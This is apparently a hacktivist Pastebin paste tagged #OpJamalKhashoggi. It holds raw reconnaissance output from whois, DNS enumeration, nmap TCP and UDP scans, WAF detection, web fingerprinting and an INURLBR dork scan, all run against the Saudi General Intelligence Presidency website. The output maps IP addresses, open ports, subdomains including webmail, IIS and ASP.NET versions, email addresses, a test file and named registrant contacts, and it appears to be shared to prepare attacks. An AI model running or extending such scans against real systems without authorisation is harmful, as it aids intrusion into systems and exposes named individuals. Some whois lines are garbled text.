Advertisement
Guest User

Anonymous JTSEC #OpJamalKhashoggi Full Recon #1

a guest
Oct 21st, 2018
3,381
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 114.74 KB | None | 0 0
  1. #######################################################################################################################################
  2. Nom de l'hôte gip.gov.sa FAI King Abdul Aziz City for Science and Technology
  3. Continent Asie Drapeau
  4. SA
  5. Pays Arabie Séoudite Code du pays SA
  6. Région Inconnu Heure locale 21 Oct 2018 21:14 +03
  7. Ville Inconnu Code Postal Inconnu
  8. Adresse IP 212.138.117.71 Latitude 25
  9. Longitude 45
  10. #######################################################################################################################################
  11. > gip.gov.sa
  12. Server: 10.211.254.254
  13. Address: 10.211.254.254#53
  14.  
  15. Non-authoritative answer:
  16. Name: gip.gov.sa
  17. Address: 212.138.117.71
  18. #######################################################################################################################################
  19. HostIP:212.138.117.71
  20. HostName:gip.gov.sa
  21.  
  22. Gathered Inet-whois information for 212.138.117.71
  23. ---------------------------------------------------------------------------------------------------------------------------------------
  24.  
  25.  
  26. inetnum: 212.138.112.0 - 212.138.117.255
  27. netname: ISU-8
  28. descr: Internet Service Unit ISU
  29. country: SA
  30. admin-c: KR6046-RIPE
  31. tech-c: KR6046-RIPE
  32. status: ASSIGNED PA
  33. mnt-by: KACST-ISU-MNT
  34. mnt-routes: KACST-ISU-MNT
  35. mnt-lower: KACST-ISU-MNT
  36. remarks: ------------------------------------------------------
  37. remarks: Part of this IP block has been used for proxy/cache
  38. remarks: service at the National level in Saudi Arabia. All
  39. remarks: Saudi Arabia web traffic will come from this IP block.
  40. remarks:
  41. remarks: If you experience high volume of traffic from
  42. remarks: IP in this block it is because your site is very
  43. remarks: popular/famous of Saudi Arabia community.
  44. remarks:
  45. remarks: For any abuse activities please contact us through
  46. remarks: Email: abuse@isu.net.sa
  47. remarks: Phone: +96614813933 (24x7)
  48. remarks: Fax: +96614813221
  49. remarks: ------------------------------------------------------
  50. created: 2004-08-03T12:57:57Z
  51. last-modified: 2005-04-13T10:18:31Z
  52. source: RIPE
  53.  
  54. role: KACST ROLE
  55. address: Saudi Network Information Center, ISU
  56. address: King Abdulaziz City for Science and Technology,
  57. address: P.O.Box 6086, Riyadh 11442, Saudi Arabia.
  58. remarks: abuse-mailbox: abuse@isu.net.sa
  59. phone: +9661 481 3933
  60. fax-no: +9661 481 3254
  61. remarks: trouble: abuse@isu.net.sa
  62. admin-c: AA27098-RIPE
  63. tech-c: QLTI1-RIPE
  64. tech-c: AIA5-RIPE
  65. nic-hdl: KR6046-RIPE
  66. remarks: This Role object is for handling and maintaining all
  67. remarks: IP Blocks registered by ISU-KACST(LIR) in Saudi Arabia.
  68. mnt-by: KACST-ISU-MNT
  69. remarks: abuse-mailbox: abuse@isu.net.sa
  70. created: 1970-01-01T00:00:00Z
  71. last-modified: 2018-03-26T11:50:33Z
  72. source: RIPE # Filtered
  73.  
  74. % Information related to '212.138.64.0/18AS8895'
  75.  
  76. route: 212.138.64.0/18
  77. descr: ISU SUMMERIZATIONS
  78. origin: AS8895
  79. mnt-by: ISU-NOC
  80. created: 2011-03-27T10:01:52Z
  81. last-modified: 2011-03-27T10:01:52Z
  82. source: RIPE
  83.  
  84. % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
  85.  
  86.  
  87.  
  88. Gathered Inic-whois information for gip.gov.sa
  89. ---------------------------------------------------------------------------------------------------------------------------------------
  90.  
  91. Domain Name: gip.gov.sa
  92.  
  93. Registrant:
  94. General Intelligence Presidency رئاسة الإستخبارات العامة (مركز المعلومات)
  95. Address: لا يوجد
  96. Riyadh الرياض
  97. Saudi Arabia المملكة العربية السعودية
  98.  
  99. Administrative Contact:
  100. مسفر محمد سعيد القحطاني
  101. Address: االرياض حي النخيل طرjV@�كي�
  102. �� �T�خرج 2
  103. 11741 الرياض
  104. Saudi Arabia
  105.  
  106. Technical Contact:
  107. Eyad Yousef اياد يوسف
  108. Address: لا يوجد
  109. لا يوجد Riyadh الرياض
  110. Saudi Arabia المملكة العربية السعودية
  111.  
  112. Name Servers:
  113. gip-ns1.isu.net.sa
  114. gip-ns2.isu.net.sa
  115.  
  116. Created on: 2007-11-06
  117. Last Updated on: 2016-08-22
  118.  
  119. Gathered Netcraft information for gip.gov.sa
  120. ---------------------------------------------------------------------------------------------------------------------------------------
  121.  
  122. Retrieving Netcraft.com information for gip.gov.sa
  123. Netcraft.com Information gathered
  124.  
  125. Gathered Subdomain information for gip.gov.sa
  126. ---------------------------------------------------------------------------------------------------------------------------------------
  127. Searching Google.com:80...
  128. HostName:www.gip.gov.sa
  129. HostIP:212.138.117.71
  130. Searching Altavista.com:80...
  131. Found 1 possible subdomain(s) for host gip.gov.sa, Searched 0 pages containing 0 results
  132.  
  133. Gathered E-Mail information for gip.gov.sa
  134. ---------------------------------------------------------------------------------------------------------------------------------------
  135. Searching Google.com:80...
  136. Searching Altavista.com:80...
  137. Found 0 E-Mail(s) for host gip.gov.sa, Searched 0 pages containing 0 results
  138.  
  139. Gathered TCP Port information for 212.138.117.71
  140. ---------------------------------------------------------------------------------------------------------------------------------------
  141.  
  142. Port State
  143.  
  144. 80/tcp open
  145.  
  146. Portscan Finished: Scanned 150 ports, 1 ports were in state closed
  147.  
  148. #######################################################################################################################################
  149. [i] Scanning Site: https://gip.gov.sa
  150.  
  151.  
  152.  
  153. B A S I C I N F O
  154. =======================================================================================================================================
  155.  
  156.  
  157. [+] Site Title: رئاسة الاستخبارات العامة
  158. [+] IP address: 212.138.117.71
  159. [+] Web Server: Microsoft-IIS/8.5
  160. [+] CMS: Could Not Detect
  161. [+] Cloudflare: Not Detected
  162. [+] Robots File: Found
  163.  
  164.  
  165.  
  166. W H O I S L O O K U P
  167. =======================================================================================================================================
  168.  
  169. % SaudiNIC Whois server.
  170. % Rights restricted by copyright.
  171. % http://nic.sa/en/view/whois-cmd-copyright
  172.  
  173. Domain Name: gip.gov.sa
  174.  
  175. Registrant:
  176. General Intelligence Presidency رئاسة الإستخبارات العامة (مركز المعلومات)
  177. Address: لا يوجد
  178. Riyadh الرياض
  179. Saudi Arabia المملكة العربية السعودية
  180.  
  181. Administrative Contact:
  182. مسفر محمد سعيد القحطاني
  183. Address: االرياض حي النخيل طريق الامام تركي مخرج 2
  184. 11741 الرياض
  185. Saudi Arabia
  186.  
  187. Technical Contact:
  188. Eyad Yousef اياد يوسف
  189. Address: لا يوجد
  190. لا يوجد Riyadh الرياض
  191. Saudi Arabia المملكة العربية السعودية
  192.  
  193. Name Servers:
  194. gip-ns1.isu.net.sa
  195. gip-ns2.isu.net.sa
  196.  
  197. Created on: 2007-11-06
  198. Last Updated on: 2016-08-22
  199.  
  200.  
  201.  
  202.  
  203.  
  204. G E O I P L O O K U P
  205. =======================================================================================================================================
  206.  
  207. [i] IP Address: 212.138.117.71
  208. [i] Country: SA
  209. [i] State: N/A
  210. [i] City: N/A
  211. [i] Latitude: 25.000000
  212. [i] Longitude: 45.000000
  213.  
  214.  
  215.  
  216.  
  217.  
  218. D N S L O O K U P
  219. =======================================================================================================================================
  220.  
  221. ;; Truncated, retrying in TCP mode.
  222. gip.gov.sa. 10800 IN SOA gip-ns1.isu.net.sa. hostmaster.gip.gov.sa. 2018100800 86400 3600 604800 10800
  223. gip.gov.sa. 10800 IN NS gip-ns2.isu.net.sa.
  224. gip.gov.sa. 10800 IN NS gip-ns1.isu.net.sa.
  225. gip.gov.sa. 10800 IN MX 20 cmail2.isu.sa.
  226. gip.gov.sa. 10800 IN MX 10 cmail1.isu.sa.
  227. gip.gov.sa. 10800 IN TXT "v=spf1 mx -all"
  228. gip.gov.sa. 10800 IN A 212.138.117.71
  229.  
  230.  
  231.  
  232.  
  233. S U B N E T C A L C U L A T I O N
  234. =======================================================================================================================================
  235.  
  236. Address = 212.138.117.71
  237. Network = 212.138.117.71 / 32
  238. Netmask = 255.255.255.255
  239. Broadcast = not needed on Point-to-Point links
  240. Wildcard Mask = 0.0.0.0
  241. Hosts Bits = 0
  242. Max. Hosts = 1 (2^0 - 0)
  243. Host Range = { 212.138.117.71 - 212.138.117.71 }
  244.  
  245.  
  246.  
  247. N M A P P O R T S C A N
  248. =======================================================================================================================================
  249.  
  250.  
  251. Starting Nmap 7.40 ( https://nmap.org ) at 2018-10-21 18:20 UTC
  252. Nmap scan report for gip.gov.sa (212.138.117.71)
  253. Host is up (0.17s latency).
  254. PORT STATE SERVICE
  255. 21/tcp filtered ftp
  256. 22/tcp filtered ssh
  257. 23/tcp filtered telnet
  258. 80/tcp open http
  259. 110/tcp filtered pop3
  260. 143/tcp filtered imap
  261. 443/tcp open https
  262. 3389/tcp filtered ms-wbt-server
  263.  
  264. Nmap done: 1 IP address (1 host up) scanned in 3.24 seconds
  265.  
  266.  
  267.  
  268. S U B - D O M A I N F I N D E R
  269. =======================================================================================================================================
  270.  
  271.  
  272. [i] Total Subdomains Found : 3
  273.  
  274. [+] Subdomain: mx2.gip.gov.sa
  275. [-] IP: 212.138.117.192
  276.  
  277. [+] Subdomain: webmail.gip.gov.sa
  278. [-] IP: 212.138.117.190
  279.  
  280. [+] Subdomain: www.gip.gov.sa
  281. [-] IP: 212.138.117.71
  282.  
  283. #######################################################################################################################################
  284. [?] Enter the target: https://gip.gov.sa/
  285. [!] IP Address : 212.138.117.71
  286. [!] Server: Microsoft-IIS/8.5
  287. [!] Powered By: ASP.NET
  288. [+] Operating System : Windows
  289. [!] gip.gov.sa doesn't seem to use a CMS
  290. [+] Honeypot Probabilty: 0%
  291. ---------------------------------------------------------------------------------------------------------------------------------------
  292. [~] Trying to gather whois information for gip.gov.sa
  293. [+] Whois information found
  294. [-] Unable to build response, visit https://who.is/whois/gip.gov.sa
  295. ---------------------------------------------------------------------------------------------------------------------------------------
  296. PORT STATE SERVICE
  297. 21/tcp filtered ftp
  298. 22/tcp filtered ssh
  299. 23/tcp filtered telnet
  300. 80/tcp open http
  301. 110/tcp filtered pop3
  302. 143/tcp filtered imap
  303. 443/tcp open https
  304. 3389/tcp filtered ms-wbt-server
  305. Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds
  306. ---------------------------------------------------------------------------------------------------------------------------------------
  307. [verbose] Retrieved token: 5MlOusPMujLTMcGJjlFoqZuynPzcBJBq
  308.  
  309. [+] DNS Records
  310. gip-ns2.isu.net.sa. (212.138.117.74) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  311. gip-ns1.isu.net.sa. (212.138.117.73) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  312.  
  313. [+] MX Records
  314. 20 (212.138.116.70) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  315.  
  316. [+] MX Records
  317. 10 (212.138.116.69) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  318.  
  319. [+] Host Records (A)
  320. webmail.gip.gov.saHTTPS: (212.138.117.190) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  321. www.gip.gov.saHTTP: (212.138.117.71) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  322. mx1.gip.gov.sa (mx1.gip.gov.sa) (212.138.117.191) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  323. mx2.gip.gov.sa (mx2.gip.gov.sa) (212.138.117.192) AS8895 King Abdul Aziz City for Science and Technology Saudi Arabia
  324.  
  325. [+] TXT Records
  326. "v=spf1 mx -all"
  327.  
  328. [+] DNS Map: https://dnsdumpster.com/static/map/gip.gov.sa.png
  329.  
  330. [>] Initiating 3 intel modules
  331. [>] Loading Alpha module (1/3)
  332. [>] Beta module deployed (2/3)
  333. [>] Gamma module initiated (3/3)
  334.  
  335.  
  336. [+] Emails found:
  337. ---------------------------------------------------------------------------------------------------------------------------------------
  338. help@gip.gov.sa
  339. info@gip.gov.sa
  340. pixel-1540145970685180-web-@gip.gov.sa
  341.  
  342. [+] Hosts found in search engines:
  343. ---------------------------------------------------------------------------------------------------------------------------------------
  344. [-] Resolving hostnames IPs...
  345. 212.138.117.71:www.gip.gov.sa
  346. [+] Virtual hosts:
  347. ---------------------------------------------------------------------------------------------------------------------------------------
  348. 212.138.117.71 www.gip.gov.sa
  349. [~] Crawling the target for fuzzable URLs
  350. [-] No fuzzable URLs found
  351. #######################################################################################################################################
  352. [+] Hosting Info for Website: gip.gov.sa
  353. [+] Visitors per day: 2,310
  354. [+] IP Address: ...
  355. [+] IP Reverse DNS (Host): 212.138.117.71
  356. [+] Hosting Company IP Owner: Internet Service Unit Isu
  357. [+] Hosting IP Range: 212.138.112.0 - 212.138.117.255 (1,536 ip)
  358. [+] Hosting Address: Saudi Network Information Center, ISU, King Abdulaziz City For Science And Technology, P.o.box 6086, Riyadh 11442, Saudi Arabia
  359. [+] Owner Address: Saudi Network Information Center, ISU, King Abdulaziz City For Science And Technology, P.o.box 6086, Riyadh 11442, Saudi Arabia
  360. [+] Hosting Country: SAU
  361. [+] Owner Country: SAU
  362. [+] Hosting Phone: +9661 481 3933, +966 1 481 3933, +966 11 481 4256
  363. [+] Owner Phone: +9661 481 3933
  364. [+] Hosting Website: www.isu.net.sa
  365. [+] Owner Website: www.isu.net.sa
  366. [+] Owner CIDR: 212.138.112.0/22, <a href="/view/ip_addresses/212.138.116.0">212.138.116.0</a>/23
  367.  
  368. [+] Hosting CIDR: 212.138.0.0/16
  369.  
  370. [+] NS: gip-ns1.isu.net.sa
  371. [+] NS: gip-ns2.isu.net.sa
  372. #######################################################################################################################################
  373.  
  374. ; <<>> DiG 9.11.4-P2-3-Debian <<>> gip.gov.sa
  375. ;; global options: +cmd
  376. ;; Got answer:
  377. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31764
  378. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
  379.  
  380. ;; QUESTION SECTION:
  381. ;gip.gov.sa. IN A
  382.  
  383. ;; ANSWER SECTION:
  384. gip.gov.sa. 2832 IN A 212.138.117.71
  385.  
  386. ;; Query time: 429 msec
  387. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  388. ;; WHEN: dim oct 21 14:36:20 EDT 2018
  389. ;; MSG SIZE rcvd: 44
  390. #######################################################################################################################################
  391. [*] Processing domain gip.gov.sa
  392. [+] Getting nameservers
  393. 212.138.117.74 - gip-ns2.isu.net.sa
  394. 212.138.117.73 - gip-ns1.isu.net.sa
  395. [-] Zone transfer failed
  396.  
  397. [+] MX records found, added to target list
  398. 10 cmail1.isu.sa.
  399. 20 cmail2.isu.sa.
  400.  
  401. [*] Scanning gip.gov.sa for A records
  402. 212.138.117.71 - gip.gov.sa
  403. 212.138.117.191 - mx1.gip.gov.sa
  404. 212.138.117.192 - mx2.gip.gov.sa
  405. 212.138.117.190 - webmail.gip.gov.sa
  406. 212.138.117.71 - www.gip.gov.sa
  407. #######################################################################################################################################
  408. Start: 2018-10-21T19:11:31+0000
  409. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  410. 1.|-- 45.79.12.202 0.0% 3 1.1 0.9 0.7 1.1 0.2
  411. 2.|-- 45.79.12.6 0.0% 3 0.5 1.2 0.5 2.4 1.0
  412. 3.|-- ae8-21.cr6-dal3.ip4.gtt.net 0.0% 3 1.2 1.1 1.0 1.2 0.1
  413. 4.|-- xe-1-1-0.ar2-lon1.ip4.gtt.net 0.0% 3 111.3 111.0 110.6 111.3 0.3
  414. 5.|-- integrated-telecom-gw.ip4.gtt.net 0.0% 3 201.4 201.4 201.3 201.4 0.1
  415. 6.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  416. 7.|-- 212.26.63.252 0.0% 3 202.6 202.2 201.9 202.6 0.3
  417. 8.|-- 212.138.117.71 0.0% 3 202.4 204.3 202.1 208.3 3.5
  418. #######################################################################################################################################
  419. Ip Address Status Type Domain Name Server
  420. ---------- ------ ---- ----------- ------
  421. 212.138.117.191 host mx1.gip.gov.sa
  422. 212.138.117.190 host webmail.gip.gov.sa
  423. 212.138.117.71 301 host www.gip.gov.sa Microsoft-IIS/8.5
  424. #######################################################################################################################################
  425. dnsenum VERSION:1.2.4
  426.  
  427. ----- gip.gov.sa -----
  428.  
  429.  
  430. Host's addresses:
  431. __________________
  432.  
  433. gip.gov.sa. 2743 IN A 212.138.117.71
  434.  
  435.  
  436. Name Servers:
  437. ______________
  438.  
  439. gip-ns1.isu.net.sa. 2443 IN A 212.138.117.73
  440. gip-ns2.isu.net.sa. 2443 IN A 212.138.117.74
  441.  
  442.  
  443. Mail (MX) Servers:
  444. ___________________
  445.  
  446. cmail1.isu.sa. 3600 IN A 212.138.116.69
  447. cmail2.isu.sa. 3600 IN A 212.138.116.70
  448.  
  449.  
  450. Trying Zone Transfers and getting Bind Versions:
  451. _________________________________________________
  452.  
  453.  
  454. Trying Zone Transfer for gip.gov.sa on gip-ns1.isu.net.sa ...
  455.  
  456. Trying Zone Transfer for gip.gov.sa on gip-ns2.isu.net.sa ...
  457.  
  458. brute force file not specified, bay.
  459. #######################################################################################################################################
  460. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:38 EDT
  461. Nmap scan report for gip.gov.sa (212.138.117.71)
  462. Host is up (0.60s latency).
  463. Not shown: 468 closed ports, 6 filtered ports
  464. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  465. PORT STATE SERVICE
  466. 80/tcp open http
  467. 443/tcp open https
  468. #######################################################################################################################################
  469. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:38 EDT
  470. Nmap scan report for gip.gov.sa (212.138.117.71)
  471. Host is up.
  472.  
  473. PORT STATE SERVICE
  474. 53/udp open|filtered domain
  475. 67/udp open|filtered dhcps
  476. 68/udp open|filtered dhcpc
  477. 69/udp open|filtered tftp
  478. 88/udp open|filtered kerberos-sec
  479. 123/udp open|filtered ntp
  480. 137/udp open|filtered netbios-ns
  481. 138/udp open|filtered netbios-dgm
  482. 139/udp open|filtered netbios-ssn
  483. 161/udp open|filtered snmp
  484. 162/udp open|filtered snmptrap
  485. 389/udp open|filtered ldap
  486. 520/udp open|filtered route
  487. 2049/udp open|filtered nfs
  488. #######################################################################################################################################
  489. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:38 EDT
  490. Nmap scan report for gip.gov.sa (212.138.117.71)
  491. Host is up.
  492.  
  493. PORT STATE SERVICE VERSION
  494. 67/udp open|filtered dhcps
  495. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  496. Too many fingerprints match this host to give specific OS details
  497.  
  498. TRACEROUTE (using proto 1/icmp)
  499. HOP RTT ADDRESS
  500. 1 ... 30
  501.  
  502. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  503. Nmap done: 1 IP address (1 host up) scanned in 111.76 seconds
  504. + -- --=[Port 68 opened... running tests...
  505. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:40 EDT
  506. Nmap scan report for gip.gov.sa (212.138.117.71)
  507. Host is up.
  508.  
  509. PORT STATE SERVICE VERSION
  510. 68/udp open|filtered dhcpc
  511. Too many fingerprints match this host to give specific OS details
  512.  
  513. TRACEROUTE (using proto 1/icmp)
  514. HOP RTT ADDRESS
  515. 1 ... 30
  516.  
  517. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  518. Nmap done: 1 IP address (1 host up) scanned in 111.77 seconds
  519. + -- --=[Port 69 opened... running tests...
  520. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:42 EDT
  521. NSE: failed to initialize the script engine:
  522. /usr/bin/../share/nmap/nse_main.lua:823: 'tftp*' did not match a category, filename, or directory
  523. stack traceback:
  524. [C]: in function 'error'
  525. /usr/bin/../share/nmap/nse_main.lua:823: in local 'get_chosen_scripts'
  526. /usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
  527. [C]: in ?
  528. #######################################################################################################################################
  529.  
  530. ^ ^
  531. _ __ _ ____ _ __ _ _ ____
  532. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  533. | V V // o // _/ | V V // 0 // 0 // _/
  534. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  535. <
  536. ...'
  537.  
  538. WAFW00F - Web Application Firewall Detection Tool
  539.  
  540. By Sandro Gauci && Wendel G. Henrique
  541.  
  542. Checking http://gip.gov.sa
  543. Generic Detection results:
  544. The site http://gip.gov.sa seems to be behind a WAF or some sort of security solution
  545. Reason: Blocking is being done at connection/packet level.
  546. Number of requests: 12
  547. #######################################################################################################################################
  548. http://gip.gov.sa [301 Moved Permanently] Country[SAUDI ARABIA][SA], HTTPServer[Microsoft-IIS/8.5], IP[212.138.117.71], Microsoft-IIS[8.5], RedirectLocation[https://gip.gov.sa/], Title[Document Moved], X-Powered-By[ASP.NET]
  549. https://gip.gov.sa/ [200 OK] ASP_NET[4.0.30319][MVC5.2], Cookies[__RequestVerificationToken], Country[SAUDI ARABIA][SA], Email[help@gip.gov.sa,info@gip.gov.sa], HTML5, HTTPServer[Microsoft-IIS/8.5], HttpOnly[__RequestVerificationToken], IP[212.138.117.71], Microsoft-IIS[8.5], Script, Title[رئاسة الاستخبارات العامة], UncommonHeaders[x-aspnetmvc-version], X-Frame-Options[DENY], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge]
  550. #######################################################################################################################################
  551. wig - WebApp Information Gatherer
  552.  
  553.  
  554. Scanning https://gip.gov.sa...
  555. ______________________ SITE INFO _______________________
  556. IP Title
  557. 212.138.117.71 رئاسة الاستخبارات العامة
  558.  
  559. _______________________ VERSION ________________________
  560. Name Versions Type
  561. ASP.NET 4.0.30319 Platform
  562. IIS 8.5 Platform
  563. Microsoft Windows Server 2012 R2 OS
  564.  
  565. _____________________ INTERESTING ______________________
  566. URL Note Type
  567. /test.htm Test file Interesting
  568.  
  569. ________________________________________________________
  570. Time: 1744.5 sec Urls: 549 Fingerprints: 40401
  571. #######################################################################################################################################
  572. HTTP/1.1 301 Moved Permanently
  573. Content-Length: 142
  574. Content-Type: text/html; charset=UTF-8
  575. Location: https://gip.gov.sa/
  576. Server: Microsoft-IIS/8.5
  577. X-Powered-By: ASP.NET
  578. Date: Sun, 21 Oct 2018 19:12:11 GMT
  579. #######################################################################################################################################
  580. ---------------------------------------------------------------------------------------------------------------------------------------
  581.  
  582. [ ! ] Starting SCANNER INURLBR 2.1 at [21-10-2018 15:12:57]
  583. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  584. It is the end user's responsibility to obey all applicable local, state and federal laws.
  585. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  586.  
  587. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-gip.gov.sa.txt ]
  588. [ INFO ][ DORK ]::[ site:gip.gov.sa ]
  589. [ INFO ][ SEARCHING ]:: {
  590. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.co ]
  591.  
  592. [ INFO ][ SEARCHING ]::
  593. -[:::]
  594. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  595.  
  596. [ INFO ][ SEARCHING ]::
  597. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  598. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.bs ID: 007843865286850066037:3ajwn2jlweq ]
  599.  
  600. [ INFO ][ SEARCHING ]::
  601. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  602.  
  603. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  604.  
  605.  
  606. _[ - ]::--------------------------------------------------------------------------------------------------------------
  607. |_[ + ] [ 0 / 100 ]-[15:13:23] [ - ]
  608. |_[ + ] Target:: [ https://www.gip.gov.sa/ ]
  609. |_[ + ] Exploit::
  610. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  611. |_[ + ] More details:: / - / , ISP:
  612. |_[ + ] Found:: UNIDENTIFIED
  613. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  614.  
  615. _[ - ]::--------------------------------------------------------------------------------------------------------------
  616. |_[ + ] [ 1 / 100 ]-[15:13:29] [ - ]
  617. |_[ + ] Target:: [ https://www.gip.gov.sa/News ]
  618. |_[ + ] Exploit::
  619. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  620. |_[ + ] More details:: / - / , ISP:
  621. |_[ + ] Found:: UNIDENTIFIED
  622. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  623.  
  624. _[ - ]::--------------------------------------------------------------------------------------------------------------
  625. |_[ + ] [ 2 / 100 ]-[15:13:35] [ - ]
  626. |_[ + ] Target:: [ https://www.gip.gov.sa/JobAppli ]
  627. |_[ + ] Exploit::
  628. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  629. |_[ + ] More details:: / - / , ISP:
  630. |_[ + ] Found:: UNIDENTIFIED
  631. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  632.  
  633. _[ - ]::--------------------------------------------------------------------------------------------------------------
  634. |_[ + ] [ 3 / 100 ]-[15:13:41] [ - ]
  635. |_[ + ] Target:: [ https://www.gip.gov.sa/Inquiry ]
  636. |_[ + ] Exploit::
  637. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  638. |_[ + ] More details:: / - / , ISP:
  639. |_[ + ] Found:: UNIDENTIFIED
  640. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  641.  
  642. _[ - ]::--------------------------------------------------------------------------------------------------------------
  643. |_[ + ] [ 4 / 100 ]-[15:13:45] [ - ]
  644. |_[ + ] Target:: [ https://www.gip.gov.sa/Wanted ]
  645. |_[ + ] Exploit::
  646. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  647. |_[ + ] More details:: / - / , ISP:
  648. |_[ + ] Found:: UNIDENTIFIED
  649.  
  650. _[ - ]::--------------------------------------------------------------------------------------------------------------
  651. |_[ + ] [ 5 / 100 ]-[15:13:51] [ - ]
  652. |_[ + ] Target:: [ https://www.gip.gov.sa/pages ]
  653. |_[ + ] Exploit::
  654. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  655. |_[ + ] More details:: / - / , ISP:
  656. |_[ + ] Found:: UNIDENTIFIED
  657.  
  658. _[ - ]::--------------------------------------------------------------------------------------------------------------
  659. |_[ + ] [ 6 / 100 ]-[15:13:57] [ - ]
  660. |_[ + ] Target:: [ https://www.gip.gov.sa/m/ ]
  661. |_[ + ] Exploit::
  662. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  663. |_[ + ] More details:: / - / , ISP:
  664. |_[ + ] Found:: UNIDENTIFIED
  665. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  666.  
  667. _[ - ]::--------------------------------------------------------------------------------------------------------------
  668. |_[ + ] [ 7 / 100 ]-[15:14:02] [ - ]
  669. |_[ + ] Target:: [ https://www.gip.gov.sa/SiteCollectionImages/ ]
  670. |_[ + ] Exploit::
  671. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  672. |_[ + ] More details:: / - / , ISP:
  673. |_[ + ] Found:: UNIDENTIFIED
  674. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  675.  
  676. _[ - ]::--------------------------------------------------------------------------------------------------------------
  677. |_[ + ] [ 8 / 100 ]-[15:14:07] [ - ]
  678. |_[ + ] Target:: [ https://gip.gov.sa/news1.html ]
  679. |_[ + ] Exploit::
  680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  681. |_[ + ] More details:: / - / , ISP:
  682. |_[ + ] Found:: UNIDENTIFIED
  683.  
  684. _[ - ]::--------------------------------------------------------------------------------------------------------------
  685. |_[ + ] [ 9 / 100 ]-[15:14:13] [ - ]
  686. |_[ + ] Target:: [ https://www.gip.gov.sa/Pages/Jobs ]
  687. |_[ + ] Exploit::
  688. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  689. |_[ + ] More details:: / - / , ISP:
  690. |_[ + ] Found:: UNIDENTIFIED
  691. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  692.  
  693. _[ - ]::--------------------------------------------------------------------------------------------------------------
  694. |_[ + ] [ 10 / 100 ]-[15:14:19] [ - ]
  695. |_[ + ] Target:: [ https://gip.gov.sa/mission.html ]
  696. |_[ + ] Exploit::
  697. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  698. |_[ + ] More details:: / - / , ISP:
  699. |_[ + ] Found:: UNIDENTIFIED
  700.  
  701. _[ - ]::--------------------------------------------------------------------------------------------------------------
  702. |_[ + ] [ 11 / 100 ]-[15:14:24] [ - ]
  703. |_[ + ] Target:: [ https://gip.gov.sa/aboutksa.html ]
  704. |_[ + ] Exploit::
  705. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  706. |_[ + ] More details:: / - / , ISP:
  707. |_[ + ] Found:: UNIDENTIFIED
  708.  
  709. _[ - ]::--------------------------------------------------------------------------------------------------------------
  710. |_[ + ] [ 12 / 100 ]-[15:14:30] [ - ]
  711. |_[ + ] Target:: [ https://gip.gov.sa/leaders.html ]
  712. |_[ + ] Exploit::
  713. |_[ + ] Information Server:: , , IP:212.138.117.71:443
